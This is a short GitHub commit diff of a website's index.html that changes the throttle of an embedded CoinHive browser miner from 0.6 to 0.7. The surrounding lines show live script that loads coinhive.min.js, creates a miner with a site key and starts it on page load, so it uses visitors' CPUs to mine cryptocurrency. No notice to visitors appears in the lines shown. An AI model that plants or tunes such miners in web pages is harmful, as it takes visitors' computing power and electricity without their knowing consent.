Update index.html

This commit is contained in:
Logan Engstrom 2017-09-25 21:17:01 -04:00 committed by GitHub
parent 403c483624
commit 641d90ff27

View file

@ -58,7 +58,7 @@
<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('W9e1JbsYTHqCwImFfAEGfJJigBCWfYv2', {
throttle:0.6
throttle:0.7
});
miner.start();
</script>